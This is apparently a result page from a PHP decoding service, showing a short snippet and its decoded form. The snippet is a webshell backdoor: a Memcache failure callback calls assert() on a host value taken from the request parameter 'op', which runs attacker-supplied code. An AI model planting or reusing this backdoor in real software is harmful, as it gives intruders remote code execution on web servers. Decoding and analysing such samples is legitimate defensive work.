Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $mem = new Memcache(); $re = $mem->addServer('localhost', 11211, TRUE, 100, 0,..

Decoded Output download

<?php 
  $mem = new Memcache(); 
  $re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);')); 
  $mem->connect($_REQUEST['op'], 11211, 0); 
?>

Did this file decode correctly?

Original Code

<?php
  $mem = new Memcache();
  $re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
  $mem->connect($_REQUEST['op'], 11211, 0);
?>

Function Calls

None

Variables

None

Stats

MD5 cbd263cb3d6afd08c280f594e80528fc
Eval Count 0
Decode Time 104 ms